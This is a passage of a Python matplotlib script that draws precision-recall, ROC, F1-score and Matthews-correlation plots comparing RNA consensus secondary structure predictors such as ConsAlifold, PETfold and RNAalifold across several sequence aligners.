line_1, = pyplot.plot(probcons_plus_consalifold_ppvs, probcons_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(probcons_plus_centroidalifold_ppvs, probcons_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(probcons_plus_petfold_ppvs, probcons_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(probcons_plus_rnaalifold_ppv, probcons_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
image_dir_path = asset_dir_path + "/images"
if not os.path.exists(image_dir_path):
os.mkdir(image_dir_path)
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(mafft_plus_consalifold_ppvs, mafft_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_plus_centroidalifold_ppvs, mafft_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_plus_petfold_ppvs, mafft_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_plus_rnaalifold_ppv, mafft_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(clustalw_plus_consalifold_ppvs, clustalw_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(clustalw_plus_centroidalifold_ppvs, clustalw_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(clustalw_plus_petfold_ppvs, clustalw_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(clustalw_plus_rnaalifold_ppv, clustalw_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_ppvs, mafft_xinsi_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_xinsi_plus_centroidalifold_ppvs, mafft_xinsi_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_xinsi_plus_petfold_ppvs, mafft_xinsi_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_xinsi_plus_rnaalifold_ppv, mafft_xinsi_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(ref_sa_plus_consalifold_ppvs, ref_sa_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_centroidalifold_ppvs, ref_sa_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(ref_sa_plus_petfold_ppvs, ref_sa_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(ref_sa_plus_rnaalifold_ppv, ref_sa_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ProbCons.
pyplot.figure()
line_1, = pyplot.plot(probcons_plus_consalifold_fprs, probcons_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(probcons_plus_centroidalifold_fprs, probcons_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(probcons_plus_petfold_fprs, probcons_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(probcons_plus_rnaalifold_fpr, probcons_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(mafft_plus_consalifold_fprs, mafft_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_plus_centroidalifold_fprs, mafft_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_plus_petfold_fprs, mafft_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_plus_rnaalifold_fpr, mafft_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(clustalw_plus_consalifold_fprs, clustalw_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(clustalw_plus_centroidalifold_fprs, clustalw_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(clustalw_plus_petfold_fprs, clustalw_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(clustalw_plus_rnaalifold_fpr, clustalw_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_fprs, mafft_xinsi_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_xinsi_plus_centroidalifold_fprs, mafft_xinsi_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_xinsi_plus_petfold_fprs, mafft_xinsi_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_xinsi_plus_rnaalifold_fpr, mafft_xinsi_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(ref_sa_plus_consalifold_fprs, ref_sa_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_centroidalifold_fprs, ref_sa_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(ref_sa_plus_petfold_fprs, ref_sa_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(ref_sa_plus_rnaalifold_fpr, ref_sa_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ProbCons.
gammas = [i for i in range(min_gamma, max_gamma + 1)]
pyplot.figure()
line_1, = pyplot.plot(gammas, probcons_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, probcons_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, probcons_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., probcons_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_consalifold_f1_scores), max(probcons_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_centroidalifold_f1_scores), max(probcons_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_petfold_f1_scores), max(probcons_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_consalifold_f1_scores), max(mafft_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_centroidalifold_f1_scores), max(mafft_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_petfold_f1_scores), max(mafft_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(gammas, clustalw_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, clustalw_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, clustalw_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., clustalw_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_consalifold_f1_scores), max(clustalw_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_centroidalifold_f1_scores), max(clustalw_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_petfold_f1_scores), max(clustalw_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_xinsi_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_xinsi_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_xinsi_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_f1_scores), max(mafft_xinsi_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_centroidalifold_f1_scores), max(mafft_xinsi_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_petfold_f1_scores), max(mafft_xinsi_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(gammas, ref_sa_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, ref_sa_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., ref_sa_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_f1_scores), max(ref_sa_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_centroidalifold_f1_scores), max(ref_sa_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_petfold_f1_scores), max(ref_sa_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ProbCons.
pyplot.figure()
line_1, = pyplot.plot(gammas, probcons_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, probcons_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, probcons_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., probcons_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_consalifold_mccs), max(probcons_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_centroidalifold_mccs), max(probcons_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_petfold_mccs), max(probcons_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_consalifold_mccs), max(mafft_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_centroidalifold_mccs), max(mafft_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_petfold_mccs), max(mafft_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(gammas, clustalw_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, clustalw_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, clustalw_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., clustalw_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_consalifold_mccs), max(clustalw_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_centroidalifold_mccs), max(clustalw_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_petfold_mccs), max(clustalw_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_xinsi_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_xinsi_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_xinsi_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_mccs), max(mafft_xinsi_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_centroidalifold_mccs), max(mafft_xinsi_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_petfold_mccs), max(mafft_xinsi_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(gammas, ref_sa_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, ref_sa_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., ref_sa_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_mccs), max(ref_sa_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_centroidalifold_mccs), max(ref_sa_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_petfold_mccs), max(ref_sa_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_ppvs, mafft_xinsi_plus_consalifold_senss, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_consalifold_ppvs, ref_sa_plus_consalifold_senss, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(centroidhomfold_ppvs, centroidhomfold_senss, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(locarna_ppv, locarna_sens, label = "LocARNA", marker = "v", linestyle = "-")
line_5, = pyplot.plot(raf_ppv, raf_sens, label = "RAF", marker = "d", linestyle = "-")
line_6, = pyplot.plot(turbofold_ppvs, turbofold_senss, label = "TurboFold", marker = "p", linestyle = "-.")
pyplot.legend(handles = [line_1, line_2, line_3, line_4, line_5, line_6], loc = "lower left")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
image_dir_path = asset_dir_path + "/images"
if not os.path.exists(image_dir_path):
os.mkdir(image_dir_path)
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_fprs, mafft_xinsi_plus_consalifold_senss, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_consalifold_fprs, ref_sa_plus_consalifold_senss, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(centroidhomfold_fprs, centroidhomfold_senss, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(locarna_fpr, locarna_sens, label = "LocARNA", marker = "v", linestyle = "-")
line_5, = pyplot.plot(raf_fpr, raf_sens, label = "RAF", marker = "d", linestyle = "-")
line_6, = pyplot.plot(turbofold_fprs, turbofold_senss, label = "TurboFold", marker = "p", linestyle = "-.")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
gammas = [i for i in range(min_gamma, max_gamma + 1)]
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_f1_scores, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_consalifold_f1_scores, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(gammas, centroidhomfold_f1_scores, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(-3., locarna_f1_score, label = "LocARNA", marker = "v", linestyle = "-", zorder = 9)
line_5, = pyplot.plot(-3., raf_f1_score, label = "RAF", marker = "d", linestyle = "-", zorder = 10)
line_6, = pyplot.plot(gammas, turbofold_f1_scores, label = "TurboFold", marker = "p", linestyle = "-.")
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_f1_scores), max(mafft_xinsi_plus_consalifold_f1_scores), label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_8, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_f1_scores), max(ref_sa_plus_consalifold_f1_scores), label = "Reference + ConsAlifold", marker = "s", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[1])
line_9, = pyplot.plot(min_gamma + numpy.argmax(centroidhomfold_f1_scores), max(centroidhomfold_f1_scores), label = "CentroidHomfold", marker = "^", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[2])
line_10, = pyplot.plot(min_gamma + numpy.argmax(turbofold_f1_scores), max(turbofold_f1_scores), label = "TurboFold", marker = "p", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[5])
pyplot.legend(handles = [line_7, line_8, line_9, line_10], loc = "lower right")
pyplot.xlabel("$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_mccs, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_consalifold_mccs, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(gammas, centroidhomfold_mccs, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(-3., locarna_mcc, label = "LocARNA", marker = "v", linestyle = "-", zorder = 9)
line_5, = pyplot.plot(-3., raf_mcc, label = "RAF", marker = "d", linestyle = "-", zorder = 10)
line_6, = pyplot.plot(gammas, turbofold_mccs, label = "TurboFold", marker = "p", linestyle = "-.")
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_mccs), max(mafft_xinsi_plus_consalifold_mccs), label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
